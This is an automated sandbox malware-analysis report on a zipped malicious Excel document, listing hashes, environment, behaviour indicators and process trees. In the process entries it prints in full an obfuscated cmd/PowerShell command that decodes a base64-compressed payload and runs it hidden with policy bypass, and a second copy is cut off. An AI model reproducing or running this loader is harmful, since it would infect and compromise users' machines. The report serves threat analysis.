General Info

File name

del 23_04_2019 doc. N20203.zip

Full analysis
https://app.any.run/tasks/ccaa7aef-7c1b-4215-97a5-cf3f498da8c0
Verdict
Malicious activity
Analysis date
4/23/2019, 16:28:41
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

maldoc-5

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

9417064aa3e114ee066ad18f8cde6ea2

SHA1

4f695d3e0121ca97f218007216f5249b651f328e

SHA256

f24c166c2a2b5512ad2c34349ff1416860188d5bd1198669c6a2e854bf67e0bd

SSDEEP

1536:9fGa8a6nmKe1HPq4H7c8hVYbRkKg6pQ+YhT7wb:pF6nmKAy4H7cQ4IhT7O

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • cmD.exe (PID: 368)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 3244)
Starts CMD.EXE for commands execution
  • EXCEL.EXE (PID: 3244)
Creates files in the user directory
  • powershell.exe (PID: 3688)
Starts CMD.EXE for commands execution
  • cmD.exe (PID: 368)
Starts Microsoft Office Application
  • WinRAR.exe (PID: 2912)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 3244)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0001
ZipCompression:
Deflated
ZipModifyDate:
2019:04:23 16:27:20
ZipCRC:
0x0e5686da
ZipCompressedSize:
50324
ZipUncompressedSize:
83968
ZipFileName:
del 23_04_2019 doc. N20203.xls

Screenshots

Processes

Total processes
37
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

+
start winrar.exe no specs rundll32.exe no specs excel.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2912
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\del 23_04_2019 doc. N20203.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\xlicons.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\office14\excel.exe

PID
2656
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\kbdit.dll
c:\windows\system32\kbdus.dll

PID
3244
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\winmm.dll
c:\windows\system32\shdocvw.dll

PID
368
CMD
cmD /C " EchO/^^^&( $Env:COMSPec[4,15,25]-jOiN'') (NEw-oBJEct IO.COMpREsSION.DeflAtEsTREAm( [syStem.Io.MeMoRysTrEaM] [conVeRt]::FROMbasE64sTrINg( 'TZpdq+5WFYX/yr7Q7HOoSlaStZY0uYiIoKK2tM3V4RBEpCRgKu3BCOp/d45nrOyW7tK3b7I+5teYY875di/vXn725Q+//+4ff/8wffzsZ/+Mj3/+3Yex//jZ679f37/78MOnr47r24+ff/7H7/5wvXt5ff3Fy7vXXO7cr1P8TXsaxjOlfk197lKa7vh3TiltaZq2NI5dSXMa85LHePlMZbx5ecqxaDpSnq54uUv91MXLZ0lXGZd4/87jPtXYoD+nuuR05H6b+j331xR/dS/DVfpuitfTXuP7fJThLNM8pbmUveQ7DohHJS2pT2eJBXGNPv5TupL3lOpd+znVOLHGDc8px5Oz5Hgn3/H/Ja5Yh7XUuYQkem04yrTEp7kMdxmP2HWrqStDXD3Hd2sp8V1dy7DXtE/pKPqLHeNqccZRe70Yz46StynPtb/j27hHrLhqWiRJCDCcU9rKsMQ3EikEiPdCVX2O985YHSvi0CUWxQ3iu7jEHZ+8cZzVlbqGPiZd7Yx75nyx3WnB1ricxYkLb6kvM/o7UORZ+zXrrSW+iU1j5R4qjfePUpaSV9SWQrVLnFLY8yolLhhvl0MKlTxWaJJGpOoat03xF9eMTfRwm0KuOFkPx0uK6pdYOZeq16S7MG44Uh06fQr3epQtFZ+6VYndZPKQe4ulZymrbxHyzEW6jsO1XahJyo+nIdqGvnZeG+IvfKP4uxnbhdQ1Nh9WvgiXkEVQLyfFrvWS5MMpQUPeMnZT5mpJ191Cb9bCLfuWM4eh42EERp/uuH6N+9RRn+JwTLNXVs743KXFfeqqrHFx2hAK1xnx//FB9pWtpa5Du5TZeohPctgLfUlL8ba8Kb6L0zqcU0KHuTrZXydUuXPExa2vJVzRKbrItBI08q+ljLtfm+WKEaU6RSbrQnjEGiUAcstg6cCbTym4EGj4U4RqSCK/wdKxLP6KvEMeJRfHdZoGsHG/WTGzLjI1r8MzQx36tBLQtfnKRrSscvVKSBHNtQtLKPjkxHhaCcTpy4pddnlWiStmwcShOE3rRJSEw0yh2fDXUUG3E8OxYbh7rIxtJH3dQinaDdcZIyw3lBeB3uNpCCBRyrTbi2ddq2L3MHisvR49z2xUN26rmF1xnPyEoS4YSiRWOvlDf3Id4d5hbNsQJG4lI95EV8SGEEw+EAJfUp4Wyn8I1JwdqIvwm7t2vC0jndhKcCpPlvoyQFUFbbiWVl5TDo+dedBgduMqN9EqRxKGdDzVBRYEuohReeSNu2zhaTiJgj4O3vCgBqphEak1pAcPdC1FkwULLBskrENZa8PhQuPLBEKGsQKDAxTLuEolPFN0zXISrQxk7RfbhRs5VcSKqsxw6+LDHHiMSfxW+EzdFI5ytaPhSPwZXA0WwpsQfpHuhgMEFHifoAtikj6EszMnxe03H4B7orbw88DxeVICMI6TMmKJbqaFof94qdPh2ksO5JCVx0bYdIRIB0zWZy+gzpA0+1rKE2BvnB2SrSBYx95hoxldAj2CpWTlj4pk2T6DLb0eIut0KhHH3yD0027J2VXAFKfvnCmHXkjju4JAsblgPamhw6KKEqXzLB+LV8IMIZjDSWaOXQ9QdgUvIgSluHBpO0mS9R3dGylSNxT4Kjzkicp+HenaoF94KGhRHg5BZgWIMFJpbpLcASJC3QWRZHrHsoBt0YHpcj4zIIXqT2Cbjethy8yEuz0KHrKSAA6SsmjCKmARUCt1bRzXtvK2i8Nrl7hxtbpamg2+sBKtN5it6ETLq5SL/m/RoySOIUOA0LjUKEXomLo7rm6WBCiF8kQNdpLPLEYjs9+4VKRzRbSRGfEBJmLG/jqjEpQFCi86L99oQvC/2dLXGzc5nRk2GYW9OoD1AEWELB3eJVuL5oErcAqRK71UyR0bTxbIU8AstjrR0fpYIbWYD0nXhhbQohX2BGmSwYcO8hBxsBEiNznuMFZi2NQ5S254FEYU/xhnf71KBQ/fuBWzbEOGHjsiu2lTlooNQsDKKgQUPAp/ArlatiUrKih6H9e44Mq+h4FoIbxlYehmCXh1EOx+CJ+Enl0+HmZZVjLNIEw3P32kTVb7ab8yDOooAVHIVcMY15sNWpoEt8ssfB1WCRU+HghkP4sbSb+XDCq2e8JcLwjDBj26natCEXNLi+SOBW8XhbzNR2YTMKVPeGlcR4xVvnNDb2eyHSgmqqjkA/XpDwBFJjK3jMR5+pyLhCSlxmcVCFLJaaYbkm94U4NEMURB5wTmoy/AZyBhAPHm9DfkHU1Jr8HY75boJYcMtciTGx9QsG/FnAEOclHrXPCTzQF0Gq4LtLFxxhDeuXdr+ykolUoNePH+AgaanSui1ic0J9BQEN+yv3Gvw5w37zdtZaf/mfs06r962Yr2b6IAkFdV06j/5i21SldSTSCKCIiIYGbnkmI9BL0Mre3V4YPAcSexiBOHP4iPeBgfSAfjhoUEDnHthfy8PhE9mLOZ8SvclLHKZXuiRNkaKx3Q7bMFKXEQX51gn0LhjT7PKNf0qTazLQ3kIqM2h2iIKtHeIn6D/apkkPZnRbdY/LgREvsbhjbPFA+EKYEf2SXDQbJvfAGy4uoFLGnVkUICkpK5wXhRMwi+TJ1VDnTwOCUoUt6tvFM6M03Y+HgpIBOVI4lyN4PObwKKVPfC3PB3LjccbzVFuO5p0AERUOfOC8qot572JcBsNXFawQtTltSKwAmdE2NOaLtKk1gVBH2CGdrlb6zkWvdyJEvS2OvS3cloqr1D11C6GzZim0o7u/QkPoX49t+7ZRp5ZKfQr3DOMm0ulEK8zpSaCkHMQP4EUg5GJDHQk7Jd3ryD3heeuznOF4oKl/oRy71JlYjFT4rzRs8ggdp7J6uxIjIsbliN3e5fJMim6oChcYuZzSHJeLRMADz/JCFfLWmpk5EpMMpq/W2KL8BdHES+14t8uX7EV+wJckNxTPc3wsvognRm21dzqUqFUg3eqiQVMW6kBCpQv0aGhTy2apC6Qshbz5ZTRQ8SaVOG2V1nd64uLiKzmaizWJspjNFrkdOrKCV/KygaJXBXIq6Y8Fo5CSivI0J5E/ua99+4qksdAdv8I3ziVIZkVGxwXmhP0GWiKUREKw5B25MSy6npVJbQjTr5c1lN+Rq92niyYxZVdk9Y4PMdYHuTZWa4cnZBftsis0ohiPZhdLseQDKHGS73LHbg8/TF1QRRsqS4NnDvOCVMcXQt7USRb2uBGl1MZnYpu5tdkkxn8tbDVmiiUd9EHiK9nWDdblJ4SIPSw+ruj6BK+ju0lbLcRZBQOyto6QUKmsQRLhKw/m5XSMeb4lpmXRsr7F0sJXcWxBkvavX+VsaUTven/kKpROC4PEEwuM2gEDKeJVbAS05zMqopdY2o75Mror6TTWmiHIKdQE142oXLiwxC1svWapFQTDnZtgiNzJ3oDbjwG1ZTgYWcd7g5yleZvovOW5ogNu9hWgKYw8hFj0IF4wnrh2wPi80V0eAqxEhupF2dWDs6c6RYwXJz5IjH/UHDFfsDwK3FR6qUBd1iEPG+H/okaHj4zuls5EiyRmp4n5qVENmRtkdSbThRG5hFTQ0ons4MleYuHi0Fja6D9YKdagVFKoxDVZW0Kno8We9iSCddwoSX0QNzo3ZuPR58aTf1p/QZ3UKVdwx0uCs9Lk7YW2lnMHG3a1ZeSTRZWkYCcZ2vL+M6jWH10qsrXrAt/NRVr+Qws1+pzht7AEpv4a4cVoe6qINAt+42hjbKk/pVlG/O6GL94e3abmxdk8Pugf2TCwkj7+AqucDX1J6StVQdiI+03hd3p2cmSpJsPsHb1EhW64JuNPNOCoILK7rLrNZbgtdB49wdo14fVHpQS8pddrjlAbdcAOnNljjhnbQQnx7Z9fTckrsAygknTnjCmLvJClKSEoqJhEAjLndbD2LgtA7mN963GSXIamobXHidWjUHbZ9Fd6JOE3S/kdTb+yzee3ZgC9Vdb2QKdi2+EUP1U+ucxXvZOUZpYH0KOy0FJiDEhAQwslts4af4dxPZbbwTaL3fSr7bKXJGWc3j23dQ8dSIRCOXLqrPyVOSMTAMecXjPNMgqfTzAyBiWvCLgqc9rT9carAsBi0h4q5OAU2NjrmKiBteTZdEUKqqSfnB7a7dcYZXDptLXlOWTB+2nyFe0EJa4jiaKRr9fnrSEJ6t5WL12BINOF2lTWIWsuLsRIkXym5bq7QxKjOmvpHSxpRN4hQjJxVMQwx79kUhrShs8QiWc4+z/uhUDhEo3+oQud3IUi0rEY5snAsh6JLtbsJV3u2K45BivjZYVJeBmc7Satq6PZDE9czYw4d2wJaOv9xug7hdtL/MzCma1d7TtwtNkYCxjWXw6HLQfqfb09tvp2sylsM2uyf5Vmj2uKq3m5yp1e5ePBcAkgXsGu3JO/rHKURMTieQUxzLTcjUGqGnB3OT+CL86sGlDh+GrU5dGz6BjE6Fso5cqKtuZ6of1gYiTu4jcdxyh4eQLNgMPTcxt9urPSMY99obk2nzcZLBC19ZgTg1udpw7TKPFBtQ1ljsRR24T/+yuCA3LOHQauC0wRCumttoCglakWwzzxQazJ7cP9rc+VaiBvRcrdOBshWAjZBfCWNu1oXAHs1IEXwGdg4R+SN+cJ7OyC6OzhzUWWF9YkXkDMgkPbeuhEqCqU0zujaLUmMDCDiKuy9tWT4s3AKLXrCn4GzzhE2HUM7d9u4DYu4OE4WaeWRjd04bt+uwZkVaY1TfxtkL7sSMQ9RvFqKbP3oawACkJSG1SHZOCFHImDfKZqYNT3Ogy4Ohhm65MYPzlNL+2tzjAv3Uc2i8dGdisrHb6WEidEbNhIURzF5a1jA2MoGhyMkPhnLa7VhTQtEkUgPQnxh0de+R0TmV/tyKV2UyVT51bcMQXu9MkL3Qg17NEjwihDQTEsxapzZNdWOnTbWH5Ul3netmD1kW88wV+iERmA1K0KWV0KMZBaazRHG0+r4MFna6k5uR6Jk3qQvnfhUDNNNNKuijkdBy0NMR8szmpjMD3r15mDqSDNPMvtTf8JDkabLK1a4HZlV5Sk8H8KTEtICtJ/OZw0z1MtwaxTUtD8koVReuCUnRAHe833gU1IRxBr8XmDzL68yO15ZsGo0l9zualtqwh7YcMSLADM530pNmDpngAm+Vt+Zpujr1nQqu7EYIYwMurJ9uePp6Nc4JUVzegJKxzlOiUnJyBzAWBro/YxYPZQdjtVzkcv40HNPpUpegeyufzapud/SvxggVxqUzmjjZutXbfqdgNbpJNti5Et2ScXFfSxTASlZxPXlAU7o2y8qt+Aer4f5YQ8nnfCJPRGkm8oqpkCdsxfE24sF26tadhrU7MrJ/KHL7O9VWhLTYoeWBa8kUzn12aHfpYQBuHd6ezEDbno6DeIRGfAzzUptIHCRyPuTO5KiNknYGeos7TR2zbJHMpbYRv4b9DIETfSPsql6My7qFQSYwpHPppy84fecUdzlQvGNrJFI26WmvOjr7Bzekjs7HOYnyOxBgmjUaVW40MQ9vw2SNYfzmYl3lhG2OOqbmgh5kHkhTWmeLufFE4979VQ+FWguN0kc1HI0bfjRymK6dT8fMvww4nmY7qubnIu4Qqymxts6X0KbNQdwfYhBFk80DTDs3P49qTdB8td9q1D2HC+lWg4oydaJC77pBv06IT1EhxiBXEtAopjJDRCk0BIj3cjBcEZ2gOFNB6jRAnCmi0yR78DuMfQppxzhuisI4m6HGq/qV2JoDlwPUwlBjvSeoY+oH/QwsXq167Zr45VdikBRHhQBRFfRbjoiUAYKD9ktWCXCnPCyxKs6Ne+aAlqBmEV2146qvv/r6yz8dn969ntvSXft8H+vry/uX//785T/vXj789ovrX3//6puPn3/+6Ys/XJ9Seacfyu2/+vTd1998f/zl23fv37/84uXX719++dcfPvzt97/5/uP7l/+9f9E//wc=' ), [SYsTeM.io.coMPReSsIoN.COmPreSsIOnModE]::deCOmPreSS )^^^| fOReAch-OBjECt{NEw-oBJEct iO.stREAmREADeR( $_,[TexT.eNCoDiNg]::aSCiI )}).readtOEnd() | pOwerShEll -exeCutioNp bypASs -nOprOFIle -NOnIntE -WinD hidDEN ${execUTIonCOnteXt}.InvokeCoMmAnd.InVokEsCripT( ${iNput} )"
Path
C:\Windows\system32\cmD.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3584
CMD
C:\Windows\system32\cmd.exe /S /D /c" EchO/^&( $Env:COMSPec[4,15,25]-jOiN'') (NEw-oBJEct IO.COMpREsSION.DeflAtEsTREAm( [syStem.Io.MeMoRysTrEaM] [conVeRt]::FROMbasE64sTrINg( 'TZpdq+5WFYX/yr7Q7HOoSlaStZY0uYiIoKK2tM3V4RBEpCRgKu3BCOp/d45nrOyW7tK3b7I+5teYY875di/vXn725Q+//+4ff/8wffzsZ/+Mj3/+3Yex//jZ679f37/78MOnr47r24+ff/7H7/5wvXt5ff3Fy7vXXO7cr1P8TXsaxjOlfk197lKa7vh3TiltaZq2NI5dSXMa85LHePlMZbx5ecqxaDpSnq54uUv91MXLZ0lXGZd4/87jPtXYoD+nuuR05H6b+j331xR/dS/DVfpuitfTXuP7fJThLNM8pbmUveQ7DohHJS2pT2eJBXGNPv5TupL3lOpd+znVOLHGDc8px5Oz5Hgn3/H/Ja5Yh7XUuYQkem04yrTEp7kMdxmP2HWrqStDXD3Hd2sp8V1dy7DXtE/pKPqLHeNqccZRe70Yz46StynPtb/j27hHrLhqWiRJCDCcU9rKsMQ3EikEiPdCVX2O985YHSvi0CUWxQ3iu7jEHZ+8cZzVlbqGPiZd7Yx75nyx3WnB1ricxYkLb6kvM/o7UORZ+zXrrSW+iU1j5R4qjfePUpaSV9SWQrVLnFLY8yolLhhvl0MKlTxWaJJGpOoat03xF9eMTfRwm0KuOFkPx0uK6pdYOZeq16S7MG44Uh06fQr3epQtFZ+6VYndZPKQe4ulZymrbxHyzEW6jsO1XahJyo+nIdqGvnZeG+IvfKP4uxnbhdQ1Nh9WvgiXkEVQLyfFrvWS5MMpQUPeMnZT5mpJ191Cb9bCLfuWM4eh42EERp/uuH6N+9RRn+JwTLNXVs743KXFfeqqrHFx2hAK1xnx//FB9pWtpa5Du5TZeohPctgLfUlL8ba8Kb6L0zqcU0KHuTrZXydUuXPExa2vJVzRKbrItBI08q+ljLtfm+WKEaU6RSbrQnjEGiUAcstg6cCbTym4EGj4U4RqSCK/wdKxLP6KvEMeJRfHdZoGsHG/WTGzLjI1r8MzQx36tBLQtfnKRrSscvVKSBHNtQtLKPjkxHhaCcTpy4pddnlWiStmwcShOE3rRJSEw0yh2fDXUUG3E8OxYbh7rIxtJH3dQinaDdcZIyw3lBeB3uNpCCBRyrTbi2ddq2L3MHisvR49z2xUN26rmF1xnPyEoS4YSiRWOvlDf3Id4d5hbNsQJG4lI95EV8SGEEw+EAJfUp4Wyn8I1JwdqIvwm7t2vC0jndhKcCpPlvoyQFUFbbiWVl5TDo+dedBgduMqN9EqRxKGdDzVBRYEuohReeSNu2zhaTiJgj4O3vCgBqphEak1pAcPdC1FkwULLBskrENZa8PhQuPLBEKGsQKDAxTLuEolPFN0zXISrQxk7RfbhRs5VcSKqsxw6+LDHHiMSfxW+EzdFI5yt